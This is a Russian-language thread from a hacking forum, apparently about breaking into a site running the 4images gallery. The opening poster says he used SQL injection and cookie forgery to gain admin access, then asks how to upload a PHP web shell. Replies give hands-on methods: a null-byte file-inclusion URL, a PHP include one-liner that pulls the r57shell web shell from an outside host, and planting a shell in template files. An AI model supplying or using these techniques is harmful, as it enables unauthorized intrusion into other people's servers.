HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Загрузка шелла в 4images используя админ панель.
  #1  
Старый 17.01.2007, 12:38
GrAmOzEkA
Участник форума
Регистрация: 25.06.2006
Сообщений: 220
С нами: 10461853

Репутация: 178
По умолчанию Загрузка шелла в 4images используя админ панель.

Сабж. При помощи sql-inj получил ID и хеш админа путем подмены кукисов проник в админ панель и зарегал нового админа Dumer : 12345 теперь имею полный доступ к админ панели. Добавил в разрешенные типы файлов для закачки расширение php в коментах ниже написано: Разделять с помощью запятых, без пробелов. При добавлении новых типов файлов, создайте новую директорию шаблонов. Как создаётся новая директория шабов и не знаю.
Пытаюсь залить шелл вылазиет:
Цитата:
Ошибка при загрузке фотографии:
rem.php: Неправильный формат файла (php, application/octet-stream)
Я даже низнаю что придумать. Мож кто подскажет ?

Перед этим я пытался заливать шелл как картинку. Например залил шелл захожу по ссылке:
Цитата:
http://Типа сайт/gallery/index.php?template=../../data/tmp_media/135.jpg%00
Выдает:
Цитата:
Parse error: parse error, unexpected '<', expecting ',' or ';' in
z:\home\Типа сайт\images\includes\template.php(133) : eval()'d code on line 29
Заливаю шелл от nfm выдаёт тупо код и т.д. например как его просто открываеш браузером.
Скорее всего там стоит фильтр на символы: < ; ,

Вообще мне кажется надо мутить что то в админ панели. Помагите кто знает.
 
Ответить с цитированием

  #2  
Старый 18.01.2007, 02:54
TDR
Banned
Регистрация: 14.01.2007
Сообщений: 1
С нами: 10169370

Репутация: 0
По умолчанию

Цитата:
Сообщение от GrAmOzEkA  
Сабж. При помощи sql-inj получил ID и хеш админа путем подмены кукисов проник в админ панель и зарегал нового админа Dumer : 12345 теперь имею полный доступ к админ панели. Добавил в разрешенные типы файлов для закачки расширение php в коментах ниже написано: Разделять с помощью запятых, без пробелов. При добавлении новых типов файлов, создайте новую директорию шаблонов. Как создаётся новая директория шабов и не знаю.
Пытаюсь залить шелл вылазиет:
Я даже низнаю что придумать. Мож кто подскажет ?

Перед этим я пытался заливать шелл как картинку. Например залил шелл захожу по ссылке:
Выдает:


Заливаю шелл от nfm выдаёт тупо код и т.д. например как его просто открываеш браузером.
Скорее всего там стоит фильтр на символы: < ; ,

Вообще мне кажется надо мутить что то в админ панели. Помагите кто знает.

я конешно в этом ничего не понимаю, но я видел видео где перед заливом шела(вроди)чел убирал .php
Или это php-инъекция была.
 
Ответить с цитированием

  #3  
Старый 18.01.2007, 03:02
Koller
Постоянный
Регистрация: 25.07.2005
Сообщений: 471
С нами: 10944386

Репутация: 931
По умолчанию

А ты не думал, что может стоять самописный антишелл?
Если ты говоришь про галерею одной игры, то там такой и стоит...так что можешь не мучаться...
 
Ответить с цитированием

  #4  
Старый 05.03.2007, 11:28
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
С нами: 10937126

Репутация: 1316


По умолчанию

Цитата:
C:\home\sitex.ru\images\d\1.php on line 1
Когда выполняю команду: 1.php?cmd=ls -la просто белый экран.


Сам то понимаешь что это значит? )
попробуй к примеру команду dir
 
Ответить с цитированием

  #5  
Старый 06.03.2007, 11:59
InferNo23
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
С нами: 10358246

Репутация: 378
По умолчанию

если команда dir показала листинг дериктории то сервер на винде.. и wget wput нет..
 
Ответить с цитированием

  #6  
Старый 06.03.2007, 12:12
InferNo23
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
С нами: 10358246

Репутация: 378
По умолчанию

сделай не passthru(); а
PHP код:
<? include($_GET); ?>
и инклудь нормальный шелл 123.php?inc=http://inferno23x.jino-net.ru/shells/r57shell.txt
 
Ответить с цитированием

  #7  
Старый 20.01.2007, 20:57
Utochka
Постоянный
Регистрация: 21.12.2005
Сообщений: 620
С нами: 10729766

Репутация: 268


По умолчанию

конкретно с этим скриптом не работал, но можно как вариант если там можно редактировать файлы скинов, то можно попробовать внедрить шелл туды. Поищи еще какие нить скрипты на серваке, может там где нить форум есть.

А может ты неправильно указал тип файла при добавлении нового типа загружаемых файлов.
 
Ответить с цитированием

  #8  
Старый 21.01.2007, 12:47
cylaaaan
Участник форума
Регистрация: 31.08.2006
Сообщений: 149
С нами: 10365076

Репутация: 155
По умолчанию

попробуй отредактировать в шаблонах какой нибуть файл (например phpinfo.php), а потом запустить... admin/phpinfo.php (запиши туда нормальный r57shell) у меня получалось...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
доступ через админ панель!! guno PHP 6 11.10.2006 17:45
Загрузка шелла через JavaScript olen Болталка 6 03.09.2006 06:14
Дефейс по быстрому. Баги на сервере. Админ не выставил права на папки lexa Комментарии к видео 2 31.01.2005 08:54
Форум phpBB 2.0.6. Вопрос про админ панель T-REX Уязвимости CMS / форумов 11 07.10.2004 19:11



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.